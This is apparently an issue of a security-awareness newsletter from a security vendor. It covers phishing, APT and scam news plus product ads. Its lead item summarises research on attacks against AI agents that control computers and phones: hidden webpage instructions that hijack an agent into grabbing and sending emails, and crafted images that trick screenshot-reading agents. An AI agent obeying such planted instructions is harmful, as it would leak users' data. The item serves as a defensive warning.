[Beware] When Your AI Helper Becomes a Hacker's Dream Tool

AI is getting eerily good at mimicking Iron Man's Jarvis: these so-called "OS agents" can now watch your screen, click buttons, fill out forms and manage apps on your computer or phone—all on their own.

That's cool... until things go sideways. Researchers from Zhejiang University and OPPO AI Center have mapped over 60 models and 50 agent frameworks, showing just how quickly this tech is advancing—and how fast our defenses are being left behind.

So, what could go wrong?

Hidden Instructions in Web Pages: Known as "Web Indirect Prompt Injection," attackers can plant sneaky commands in a webpage to hijack the agent's behavior. For example, imagine an agent that automatically connects to your company's email—one bad page and it might login, grab your emails and send them off without you even touching the mouse.

Malicious Image Traps: A recent study revealed "malicious image patches" that are graphics crafted so that, when an agent takes a screenshot, the agent misinterprets it and takes harmful actions. Think of seeing a harmless wallpaper that actually tricks your AI into installing malware.

Mobile Threat Vectors: Mobile OS agents aren't safe either. A mapping of mobile LLM agents found 11 different attack areas—from tricks that mess with GUI reasoning to full-on hijacks. Every tested agent had at least one door wide open, and some fell victim to eight attack styles.

This isn't sci-fi, it's an urgent wake-up call. If your Jarvis-like helper has access to your inbox, calendar or sensitive systems, think about what might happen if it's tricked. We need to seriously work on security culture, not just for humans, but for AI assistants too.

More at VentureBeat: https://venturebeat.com/ai/study-warns-of-security-risks-as-os-agents-gain-control-of-computers-and-phones/

[Live Demo] Intelligent Email Defense: Automate, Remediate and Train from One Platform

As cyber attackers continue to outpace traditional defenses, it's not a question of if, but when sophisticated attacks will bypass your email security controls.

Phishing attacks are surging at an unprecedented 1,265% rate since 2022, largely driven by AI advancements. Most concerning, 31% of IT teams take more than five hours to respond to reported security issues, leaving your organization vulnerable during those critical hours when threats remain active in your users' inboxes.

During this demo, you'll discover how PhishER Plus can help take control back from rising AI phishing risks by:

• Transforming your users into active threat sensors with one-click reporting via the Phish Alert Button

• Accelerating response times with AI-powered automation that reduces manual email review by 85-99%

• Providing comprehensive threat intelligence from a network of 13+ million global users and third-party integrations

• Removing threats automatically from all mailboxes with PhishRIP before users can interact with them

• Converting real attacks into targeted training opportunities with PhishFlip

Discover how PhishER Plus combines AI and human intelligence to transform your users from security risks into your most valuable defenders.

Date/Time: TOMORROW, Wednesday, August 20 @ 2:00 PM (ET)

Save My Spot: https://info.knowbe4.com/phisher-demo-2?partnerref=LCHN2

Russian APT Uses Spear Phishing Emails to Exploit New Zero-Day

The Russia-aligned threat actor "RomCom" used spear phishing emails with phony job applications to target a zero-day flaw in the popular archiving tool WinRAR, according to researchers at ESET. WinRAR has since patched the vulnerability.

The threat actor crafted malicious archives designed to exploit the zero-day and distributed them via spear phishing emails last month. The phishing emails were disguised as responses to job openings, with the malicious attachments posing as resumes. The attacks targeted "financial, manufacturing, defense, and logistics companies in Europe and Canada."

RomCom is known for conducting cybercrime alongside espionage-focused attacks. In this case, the group appears to have been targeting entities of interest to the Russian government. "RomCom (also known as Storm-0978, Tropical Scorpius, or UNC2596) is a Russia-aligned group that conducts both opportunistic campaigns against selected business verticals and targeted espionage operations," the researchers write.

"The group's focus has shifted to include espionage operations collecting intelligence, in parallel with its more conventional cybercrime operations. The backdoor commonly used by the group is capable of executing commands and downloading additional modules to the victim's machine."

RomCom is a persistent and sophisticated group, and ESET notes that this is the third time the threat actor has used a zero-day vulnerability. "By exploiting a previously unknown zero-day vulnerability in WinRAR, the RomCom group has shown that it is willing to invest serious effort and resources into its cyberoperations," ESET says.

"This is at least the third time RomCom has used a zero-day vulnerability in the wild, highlighting its ongoing focus on acquiring and using exploits for targeted attacks. The discovered campaign targeted sectors that align with the typical interests of Russian-aligned APT groups, suggesting a geopolitical motivation behind the operation."

KnowBe4 enables your workforce to make smarter security decisions every day.

ESET has the story: https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/

Now Live: KnowBe4 Defend Integrates with Microsoft Defender for Office 365

KnowBe4 Defend now integrates with Microsoft Defender for Office 365, creating a unified protection and threat management experience that SOC teams have been asking for. This collaboration marks the launch of Microsoft's new ICES (Integrated Cloud Email Security) vendor ecosystem, with KnowBe4 as one of only two launch partners, and revolutionizes how your organization defends against sophisticated email threats.

Why This Matters

As the threat landscape continues to evolve, a single security solution, regardless of how advanced, may not catch every threat variation or attack vector. KnowBe4 Defend complements Microsoft 365's existing email security with Agentic AI approaches and advanced inbound threat detection capabilities.

This integration allows you to maintain your Microsoft security investments while adding specialized threat detection and response.

What This Means for You

• Seamless Integration - When Defend identifies potentially malicious messages, they'll automatically move to Microsoft's quarantine using your existing policies

• Unified Management - Manage all threats from a single, familiar Microsoft interface with complete visibility into KnowBe4 Defend's decisions

• Enhanced Protection - Get multiple layers of specialized detection that catch sophisticated attacks including BEC, APTs and targeted spear-phishing

• Maximized Investment - Leverage your existing Microsoft security infrastructure while adding KnowBe4's specialized capabilities

• Reduced Complexity - Eliminate friction between security tools and streamline your security operations

Ready to transform your email security? Check out KnowBe4 Defend today. https://info.knowbe4.com/defend-demo-em

Learn more about the integration: https://blog.knowbe4.com/how-knowbe4-defend-seamlessly-integrates-with-microsoft-defender-for-office-365-quarantine-and-why-soc-teams-should-care

BBB Alert: Tech Support Scammers Send Phony Podcast Invites

The Better Business Bureau (BBB) has warned that scammers are targeting high-profile employees and influencers with fake invitations to appear as a guest on popular celebrity podcasts. The scammer poses as the podcast's production manager, offering the target $2,000 for the appearance.

If the victim agrees, the attacker will ask them to hop into a virtual meeting to test their setup before the podcast. During this meeting, the attacker will attempt to take control of the victim's computer and/or steal login credentials for their social media accounts.

The BBB offers the following advice to help users avoid falling for the scam:

• "Be skeptical of emails with strange formatting and language. In this specific scam, the podcast invitation email may have strange formatting with your full name in bold letters in a font size much larger than the rest of the email.

• Check the email address of the invitation. Impostors will use fake email addresses that look very close to a real one. Take a good look at the email address before responding. Most official podcasts or businesses have their own email domain and will not use a ‘@gmail.com' email domain, for example. If you're unsure of the legitimacy of the email address, do a web search for the podcast's real contact information. You will be able to see the podcast's email domain and can verify if the communication is real. You can also reach out to the podcast on your own to verify the request you received.

• If you're being offered a lot of money out of the blue, take it as a red flag. A popular scam tactic is to entice consumers or businesses with money. If you're asked by an unknown person to do something, and are told you'll get paid to do it, take caution.

• Never let a stranger take control of your computer. It's the classic tech support scam – a scammer will pretend to be trustworthy and attempt to take control of your computer from another location. If they are successful, they may access your files and web browser to steal your information. Never let anyone take control of your computer. If you're ever asked to enter a code onto your screen, call a number that appears on a pop-up, or initiate a connection to another device, stop communication with the person and shut down your computer."

Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

The BBB has the story: https://www.bbb.org/all/business/business-scams/podcast-impostor-business-scam

5 Most Frequently Asked Questions About Human Risk Management

Human Risk Management (HRM) has emerged as both a "buzz phrase" and an essential enterprise cybersecurity competency. Yet many IT and security administrators are still unclear on what it means for their teams.

To help, KnowBe4 has put together concise answers to five of the most frequently asked questions about HRM:

Download this whitepaper to understand:

• What is HRM?

• Why is now the time for HRM?

• How can you operationalize HRM?

• Does HRM replace security awareness training?

• How should you evaluate HRM vendors?

Download Now: https://info.knowbe4.com/5-faqs-human-risk-management-chn

North Korean Threat Actor Delivers Ransomware Via Phishing Emails

The North Korean threat actor ScarCruft has incorporated ransomware into its arsenal, according to researchers at South Korean security firm S2W. ScarCruft is known for conducting espionage operations, but North Korean state-sponsored groups often conduct financially motivated attacks to generate revenue for Pyongyang.

"The deployment of ransomware, traditionally uncommon in ScarCruft campaigns, represents a notable deviation from the group's historical focus on espionage," the researchers write. "This suggests a potential shift toward financially motivated operations, or an expansion of operational goals that now include disruptive or extortion-driven tactics."

The researchers observed the threat actor deploying ransomware in a campaign targeting South Koreans last month. The attackers sent phishing emails disguised as postal-code updates regarding changes in street addresses. The emails contained malicious LNK files embedded in RAR archives, which were designed to deliver a variety of different malware strains.

"Upon execution, the LNK dropped an AutoIt loader, which then fetched and executed additional payloads including a stealer, ransomware, and backdoor from an external server," S2W says. "Among the nine distinct malware samples identified in this campaign, the following are the most notable: NubSpy, LightPeek, TxPyLoader, FadeStealer, VCD Ransomware, and CHILLYCHINO, among others."

The threat actor has also ported its malware to new programming languages in order to expand targeting and evade detection. "Existing malware, as well as publicly available code, has been ported to alternative programming languages for reuse," the researchers write.

"Similar to the group's prior use of Go-based malware like AblyGo, this campaign features malware written in Rust, suggesting a pattern of using modern languages for enhanced versatility and detection evasion. These efforts indicate ScarCruft's ongoing focus on detection evasion and tooling."

The Record has the story: https://therecord.media/scarcruft-north-korea-hackers-add-ransomware

Let's stay safe out there.

Warm regards,

Stu Sjouwerman, SACP

Executive Chairman

KnowBe4, Inc.

PS: KnowBe4 Named a 2025 Gartner Peer Insights™ Customers' Choice for Email Security Platforms: https://blog.knowbe4.com/knowbe4-named-a-2025-gartner-peer-insights-customers-choice-for-email-security-platforms

PPS: Your KnowBe4 Compliance Plus Fresh Content Updates from July 2025: https://blog.knowbe4.com/your-knowbe4-compliance-plus-fresh-content-updates-from-july-2025

"At the center of your being you have the answer; you know who you are and you know what you want." - Lao Tzu - Philosopher (6th Century BC)

"Knowing yourself is the beginning of all wisdom." - Aristotle, Philosopher (384–322 BC)

Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog https://blog.knowbe4.com/cyberheistnews-vol-15-33-beware-when-your-ai-helper-becomes-a-hackers-dream-tool

Social Engineering Attacks Distribute CastleLoader Malware

Researchers at PolySwarm warn that attackers are using social engineering tactics to deliver the CastleLoader malware. CastleLoader is a relatively new malware loader designed to deliver a variety of remote access Trojans (RATs), including StealC, RedLine, NetSupport RAT, DeerStealer, HijackLoader and SectopRAT.

"CastleLoader's primary infection vector is the ClickFix phishing technique, often themed around Cloudflare services," the researchers write. "Victims are lured to fraudulent domains mimicking software development libraries, online meeting platforms like Google Meet, or browser update notifications.

"These pages display fake error messages or CAPTCHA prompts, tricking users into copying and executing malicious PowerShell commands via the Windows Run prompt. This method bypasses traditional email-based security by exploiting user-initiated actions."

The attackers also target more technical users by planting the malware in spoofed GitHub repos. These repositories impersonate popular tools, but contain hidden functionality to install the malware in the background.

"Alternatively, CastleLoader leverages fake GitHub repositories, such as one disguised as SQL Server Management Studio (SSMS-lib), to distribute malicious installers," PolySwarm says. "These repositories exploit developers' trust in GitHub, prompting them to run seemingly legitimate software that connects to a command-and-control (C2) server."

CastleLoader has compromised hundreds of devices since May 2025, with a notable focus on US government entities. The researchers note that its "high success rate underscores the malware's effectiveness in exploiting human behavior and trusted platforms."

Organizations need to be particularly wary of ClickFix attacks. This technique recently skyrocketed in popularity, and can grant attackers a foothold within your network while evading technical security controls.

Relevant and engaging security awareness training gives your organization an essential layer of defense against phishing and other social engineering attacks. KnowBe4 empowers your workforce to make smarter security decisions every day.

PolySwarm has the story: https://blog.polyswarm.io/castleloader

Scam Alert: Smishing Messages Warn of Phony Amazon Product Recall

Malwarebytes warns of a wave of SMS phishing (smishing) texts that pose as product recall messages from Amazon. The text messages state, "We are contacting you because the product you purchased is being recalled. This recall is due to quality and safety issues. We urge you to stop using the product immediately and contact us to arrange a full refund."

The messages contain a link for more details. This link is a shortened URL that spoofs Amazon's domain and leads to a phishing site designed to steal users' credentials or money.

The messages are crafted to grab the attention of anyone who recently purchased something on Amazon. "The text messages are intentionally vague about the nature of the product or the exact issue they are being recalled for," Malwarebytes says.

"This is done so [that] a maximum number of people will think that this might concern them. If the scammers said that the TV you bought might explode, you wouldn't click the link if you hadn't purchased a TV recently."

Malwarebytes offers some advice to help users avoid falling for these scams:

• "If you receive a text like this, don't click on any links. Instead, check if it's legit by logging in to the Amazon app or website, then going to Message Centre under Your Account. Legitimate messages from Amazon will appear there.

• "Report the scam to Amazon itself, whether you've fallen for it or not. US citizens can send unwanted texts to 7726(SPAM) or use the Report Junk option.

• "Set up two-step verification for your Amazon account. This puts an extra barrier between you and the scammers if they do manage to get hold of your login details."

KnowBe4 empowers your workforce to make smarter security decisions every day.

Malwarebytes has the story: https://www.malwarebytes.com/blog/news/2025/08/that-amazon-safety-recall-message-may-well-be-a-scam

1. Warn your parents - An advisory from the FTC on a surge in scams targeting older Americans: https://www.ftc.gov/news-events/data-visualizations/data-spotlight/2025/08/false-alarm-real-scam-how-scammers-are-stealing-older-adults-life-savings

2. 'Chairmen' of $100 million scam operation extradited: https://www.bleepingcomputer.com/news/security/us-charges-ghanaians-linked-to-theft-of-100-million-in-romance-scams-bec-attacks/

3. North Korean Kimsuky hackers exposed in alleged data breach: https://www.bleepingcomputer.com/news/security/north-korean-kimsuky-hackers-exposed-in-alleged-data-breach/

4. US govt seizes $1 million in crypto from BlackSuit ransomware gang: https://www.bleepingcomputer.com/news/security/us-govt-seizes-1-million-in-crypto-from-blacksuit-ransomware-gang/

5. Deepfake AI Trading Scams Target Global Investors: https://www.infosecurity-magazine.com/news/deepfake-ai-trading-scams-target/

6. GSA introduces USAi.Gov to streamline AI adoption across government: https://www.nextgov.com/artificial-intelligence/2025/08/gsa-introduces-usaigov-streamline-ai-adoption-across-government/407443

7. SANS report finds humans still the main attack vector as 80% of organizations flag social engineering as their number one risk: https://www.sans.org/mlp/ssa-security-awareness-report

8. FBI: Cybercriminals create fictitious law firms to target victims of previous scams: https://www.ic3.gov/PSA/2025/PSA250813

9. Scammers set up over a thousand malicious gaming sites: https://krebsonsecurity.com/2025/07/scammers-unleash-flood-of-slick-online-gaming-sites/

10. Phishing URLs use Japanese Unicode characters to spoof forward slashes: https://www.bleepingcomputer.com/news/security/bookingcom-phishing-campaign-uses-sneaky-character-to-trick-you/

This Week's Links We Like, Tips, Hints and Fun Stuff

• Virtual Vaca #1 to Australia, the Great Ocean Road Trip Itinerary (Highlights + Tips): https://youtu.be/k8nuzc78bxQ

• Virtual Vaca #2 to amazing Abandoned Ancient Berber Cities, Tunisia: https://youtu.be/c_YbbcdWwnU

• BONUS Virtual Vaca From Rome to Giza. Two World Wonders in One Weekend: https://youtu.be/pt8IjgiMTiQ 28:57

• Wanna See an Epic Wingsuit Flight? | Slovenia's Finest: https://youtu.be/BY3T3u-mYr8

• The LONGEST Mountain Swoop In the World | "MUTANT line": https://youtu.be/p0DysLyOtWo

• Mario Lopez is one of the recent big surprises of the world of magic - his magic is original, simple, different, and fresh: https://www.flixxy.com/mario-lopez-fools-penn-and-teller.htm?utm_source=4

• Rivian: First Drives of their Gen 2 Quad. These EVs look very good: https://youtu.be/oR_6YxJ-jPc

• [CLASSIC] Drag Race Tesla Cybertruck v Lamborghini Urus. Who gets destroyed?: https://youtu.be/3ZmpxFZ3QIk

• Maps That Changed The Way I See The World: https://youtu.be/abOfMAwQdno?si=UWE0EMU_ffXvBfhx

• Why The Next (Brisbane, Australia) Olympics Are Already a Mess: https://youtu.be/uTcvKlNI_mE

• [SUPER INTERESTING] Why is this benchmark symbol hidden everywhere in the UK?: https://youtu.be/sWxXyR4ifbk?si=ArWQ8l5TGjExSmwi

• For Da Kids #1 - Cat Will Not Begin His Day Without His Own Cat-uccino: https://youtu.be/ITLlC5EVi_U

• For Da Kids #2 - Rescue dog looks at mom with sweetest smile: https://youtu.be/oBZAuADLAUQ

• For Da Kids #3 Strangers crosses rushing river to save stranded monkey: https://youtu.be/N4XMHgH5Lbg

• For Da Kids #4 - German Shepherd Attacks Owner with Love!: https://youtu.be/Wd2vAm-Zak8

• For Da Kids #5 - The animals' meeting with the Wolf in Wes Anderson's film 'Fantastic Mr. Fox: https://www.flixxy.com/fantastic-mr-fox-meeting-the-wolf.htm